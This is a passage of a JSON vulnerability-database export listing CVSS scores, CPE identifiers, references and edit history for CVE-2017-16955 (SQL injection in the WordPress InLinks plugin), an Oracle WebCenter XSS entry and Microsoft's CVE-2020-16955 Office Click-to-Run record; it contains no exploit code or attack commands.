"rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2021-04-23T00:24:20", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:oracle:webcenter_interaction:10.3.3"], "affectedSoftware": [{"cpeName": "oracle:webcenter_interaction", "name": "oracle webcenter interaction", "operator": "eq", "version": "10.3.3"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:webcenter_interaction:10.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://seclists.org/fulldisclosure/2018/Sep/22", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://seclists.org/fulldisclosure/2018/Sep/22"}, {"name": "105350", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/105350"}], "immutableFields": []}, {"id": "CVE-2017-16955", "bulletinFamily": "NVD", "title": "CVE-2017-16955", "description": "SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the \"keyword\" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.", "published": "2017-11-27T10:29:00", "modified": "2017-12-07T21:19:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16955", "reporter": "cve@mitre.org", "references": ["https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "https://wpvulndb.com/vulnerabilities/8962"], "cvelist": ["CVE-2017-16955"], "type": "cve", "lastseen": "2021-04-23T00:07:52", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "inlinks_project:inlinks", "name": "inlinks project inlinks", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:inlinks_project:inlinks:1.0"], "cpe23": ["cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-16955"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-89"], "description": "SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the \"keyword\" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:38", "references": [{"idList": ["PACKETSTORM:145059"], "type": "packetstorm"}, {"idList": ["WPVDB-ID:8962"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:8962"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2020-10-03T13:07:38", "rev": 2, "value": 6.2, "vector": "NONE"}}, "extraReferences": [], "hash": "9800e6f8a967a43e49141718d10f2c7de0401d9e5002e3686f082e17aaf59ea9", "hashmap": [{"hash": "107fe965df2a30a24b5194d325cdf947", "key": "description"}, {"hash": "f379cd53bc689e93d2d56964a361b261", "key": "cvelist"}, {"hash": "3a23743b550c717d37c2a24d8d13bd04", "key": "cvss2"}, {"hash": "a134170935b0e11d15ccacee6eb08cc9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "29d8ac0b7c40bde97626cc00be13b1f7", "key": "cpeConfiguration"}, {"hash": "85dd01f4cddca5f9eb5f86c2650b2bce", "key": "href"}, {"hash": "7d0b4b64750b4f56a61e25b7d165ecf6", "key": "published"}, {"hash": "83e2578a42f5296da0a2330f37ac9538", "key": "affectedSoftware"}, {"hash": "69391588becab1dac9b681792360a554", "key": "modified"}, {"hash": "0c29f90287e0dcd1a60a8cbe2115b352", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "76b191e5a3ff1516973d2f2a80655e5d", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4994f73f97fee1825d38aac7bee9aefe", "key": "cwe"}, {"hash": "9d7a1bf739aa233fb3bce7ee66cd981d", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "284d2ae32c68bca84ab9bdc6fef41385", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16955", "id": "CVE-2017-16955", "lastseen": "2020-10-03T13:07:38", "modified": "2017-12-07T21:19:00", "objectVersion": "1.3", "published": "2017-11-27T10:29:00", "references": ["https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "https://wpvulndb.com/vulnerabilities/8962"], "reporter": "cve@mitre.org", "title": "CVE-2017-16955", "type": "cve", "viewCount": 7}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:07:38"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "inlinks_project:inlinks", "name": "inlinks project inlinks", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:inlinks_project:inlinks:1.0"], "cpe23": ["cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-16955"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-89"], "description": "SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the \"keyword\" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:40", "references": [{"idList": ["PACKETSTORM:145059"], "type": "packetstorm"}, {"idList": ["WPEX-ID:8962", "WPEX-ID:D3DC270D-8623-43B0-B760-06CA9DD13170"], "type": "wpexploit"}, {"idList": ["WPVDB-ID:D3DC270D-8623-43B0-B760-06CA9DD13170", "WPVDB-ID:8962"], "type": "wpvulndb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:36:40", "rev": 2, "value": 6.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://wpvulndb.com/vulnerabilities/8962", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://wpvulndb.com/vulnerabilities/8962"}, {"name": "https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html"}], "hash": "7762d65bd9dc59db313065a8042f98a39b6d55530caaee7481a75ff48d385ec5", "hashmap": [{"hash": "107fe965df2a30a24b5194d325cdf947", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f379cd53bc689e93d2d56964a361b261", "key": "cvelist"}, {"hash": "3a23743b550c717d37c2a24d8d13bd04", "key": "cvss2"}, {"hash": "a134170935b0e11d15ccacee6eb08cc9", "key": "references"}, {"hash": "2b425464f7da424025a457617aa871ca", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "29d8ac0b7c40bde97626cc00be13b1f7", "key": "cpeConfiguration"}, {"hash": "85dd01f4cddca5f9eb5f86c2650b2bce", "key": "href"}, {"hash": "7d0b4b64750b4f56a61e25b7d165ecf6", "key": "published"}, {"hash": "83e2578a42f5296da0a2330f37ac9538", "key": "affectedSoftware"}, {"hash": "69391588becab1dac9b681792360a554", "key": "modified"}, {"hash": "0c29f90287e0dcd1a60a8cbe2115b352", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "76b191e5a3ff1516973d2f2a80655e5d", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4994f73f97fee1825d38aac7bee9aefe", "key": "cwe"}, {"hash": "9d7a1bf739aa233fb3bce7ee66cd981d", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "284d2ae32c68bca84ab9bdc6fef41385", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16955", "id": "CVE-2017-16955", "immutableFields": [], "lastseen": "2021-02-02T06:36:40", "modified": "2017-12-07T21:19:00", "objectVersion": "1.5", "published": "2017-11-27T10:29:00", "references": ["https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "https://wpvulndb.com/vulnerabilities/8962"], "reporter": "cve@mitre.org", "title": "CVE-2017-16955", "type": "cve", "viewCount": 8}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:36:40"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "inlinks_project:inlinks", "name": "inlinks project inlinks", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:inlinks_project:inlinks:1.0"], "cpe23": ["cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-16955"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-89"], "description": "SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the \"keyword\" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:23", "references": [{"idList": ["PACKETSTORM:145059"], "type": "packetstorm"}, {"idList": ["WPVDB-ID:8962"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:8962"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:23", "rev": 2, "value": 6.2, "vector": "NONE"}}, "hash": "b0113f77eab700e9e4430afeef15d995e92db83f8e660ab2f1c4a56c31cbd2f4", "hashmap": [{"hash": "107fe965df2a30a24b5194d325cdf947", "key": "description"}, {"hash": "f379cd53bc689e93d2d56964a361b261", "key": "cvelist"}, {"hash": "3a23743b550c717d37c2a24d8d13bd04", "key": "cvss2"}, {"hash": "a134170935b0e11d15ccacee6eb08cc9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "85dd01f4cddca5f9eb5f86c2650b2bce", "key": "href"}, {"hash": "7d0b4b64750b4f56a61e25b7d165ecf6", "key": "published"}, {"hash": "83e2578a42f5296da0a2330f37ac9538", "key": "affectedSoftware"}, {"hash": "69391588becab1dac9b681792360a554", "key": "modified"}, {"hash": "0c29f90287e0dcd1a60a8cbe2115b352", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "76b191e5a3ff1516973d2f2a80655e5d", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4994f73f97fee1825d38aac7bee9aefe", "key": "cwe"}, {"hash": "9d7a1bf739aa233fb3bce7ee66cd981d", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "284d2ae32c68bca84ab9bdc6fef41385", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16955", "id": "CVE-2017-16955", "lastseen": "2020-09-21T14:31:23", "modified": "2017-12-07T21:19:00", "objectVersion": "1.3", "published": "2017-11-27T10:29:00", "references": ["https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "https://wpvulndb.com/vulnerabilities/8962"], "reporter": "cve@mitre.org", "title": "CVE-2017-16955", "type": "cve", "viewCount": 5}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:31:23"}, {"bulletin": {"affectedSoftware": [{"name": "inlinks_project inlinks", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:inlinks_project:inlinks:1.0"], "cpe23": ["cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*"], "cvelist": ["CVE-2017-16955"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-89"], "description": "SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the \"keyword\" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:55", "references": [{"idList": ["PACKETSTORM:145059"], "type": "packetstorm"}, {"idList": ["WPVDB-ID:8962"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:8962"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2019-05-29T18:16:55", "rev": 2, "value": 6.2, "vector": "NONE"}}, "hash": "3f2bad31e0289ddd1b47349a05f1435dd7518e66b16f42977ffe9b2cc2de2a9d", "hashmap": [{"hash": "107fe965df2a30a24b5194d325cdf947", "key": "description"}, {"hash": "c8555a239550f164476b76b4af2d3ca4", "key": "affectedSoftware"}, {"hash": "f379cd53bc689e93d2d56964a361b261", "key": "cvelist"}, {"hash": "3a23743b550c717d37c2a24d8d13bd04", "key": "cvss2"}, {"hash": "a134170935b0e11d15ccacee6eb08cc9", "key": "references"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "85dd01f4cddca5f9eb5f86c2650b2bce", "key": "href"}, {"hash": "7d0b4b64750b4f56a61e25b7d165ecf6", "key": "published"}, {"hash": "69391588becab1dac9b681792360a554", "key": "modified"}, {"hash": "0c29f90287e0dcd1a60a8cbe2115b352", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "76b191e5a3ff1516973d2f2a80655e5d", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4994f73f97fee1825d38aac7bee9aefe", "key": "cwe"}, {"hash": "9d7a1bf739aa233fb3bce7ee66cd981d", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "284d2ae32c68bca84ab9bdc6fef41385", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16955", "id": "CVE-2017-16955", "lastseen": "2019-05-29T18:16:55", "modified": "2017-12-07T21:19:00", "objectVersion": "1.3", "published": "2017-11-27T10:29:00", "references": ["https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "https://wpvulndb.com/vulnerabilities/8962"], "reporter": "cve@mitre.org", "title": "CVE-2017-16955", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:16:55"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "83e2578a42f5296da0a2330f37ac9538"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "284d2ae32c68bca84ab9bdc6fef41385"}, {"key": "cpe23", "hash": "0c29f90287e0dcd1a60a8cbe2115b352"}, {"key": "cpeConfiguration", "hash": "9d6eca55290e2c71ecd118f1559010c1"}, {"key": "cvelist", "hash": "f379cd53bc689e93d2d56964a361b261"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3a23743b550c717d37c2a24d8d13bd04"}, {"key": "cvss3", "hash": "9d7a1bf739aa233fb3bce7ee66cd981d"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "107fe965df2a30a24b5194d325cdf947"}, {"key": "extraReferences", "hash": "2b425464f7da424025a457617aa871ca"}, {"key": "href", "hash": "85dd01f4cddca5f9eb5f86c2650b2bce"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "69391588becab1dac9b681792360a554"}, {"key": "published", "hash": "7d0b4b64750b4f56a61e25b7d165ecf6"}, {"key": "references", "hash": "a134170935b0e11d15ccacee6eb08cc9"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "76b191e5a3ff1516973d2f2a80655e5d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "80484f7af1a1e3b112784733a763e50bb6367c1c656725ae5da6957dc2cc801c", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:D3DC270D-8623-43B0-B760-06CA9DD13170"]}, {"type": "wpexploit", "idList": ["WPEX-ID:D3DC270D-8623-43B0-B760-06CA9DD13170"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145059"]}], "modified": "2021-04-23T00:07:52", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-04-23T00:07:52", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:inlinks_project:inlinks:1.0"], "affectedSoftware": [{"cpeName": "inlinks_project:inlinks", "name": "inlinks project inlinks", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:inlinks_project:inlinks:1.0:*:*:*:*:wordpress:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://wpvulndb.com/vulnerabilities/8962", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://wpvulndb.com/vulnerabilities/8962"}, {"name": "https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://packetstormsecurity.com/files/145059/WordPress-In-Link-1.0-SQL-Injection.html"}], "immutableFields": []}], "mscve": [{"id": "MS:CVE-2020-16955", "hash": "97e76a94362fa2a4fccdbc4da28a6631", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-06T10:48:58", "history": [{"bulletin": {"id": "MS:CVE-2020-16955", "hash": "a764c2b180c278d8bedcaab94b36561fcaa5519d45cfcd668f86a7f0c93601af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2020-10-13T21:02:34", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"modified": "2020-10-13T21:02:34", "references": [{"idList": ["CVE-2020-16955"], "type": "cve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-13T21:02:34", "rev": 2, "value": 7.2, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KBClick to Run", "KBNone"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft 365 Apps for Enterprise for 32-bit Systems"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft 365 Apps for Enterprise for 64-bit Systems"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2019 for 64-bit editions"}, {"kb": "KBClick to Run", "kbSupersedence": "KBNone", "msplatform": "", "name": "Microsoft Office 2019 for 32-bit editions"}], "vendorCvss": {}}, "lastseen": "2020-10-13T21:02:34", "differentElements": ["cvss"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "c92a8dc38052b22c50d64821a72c6e58", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security 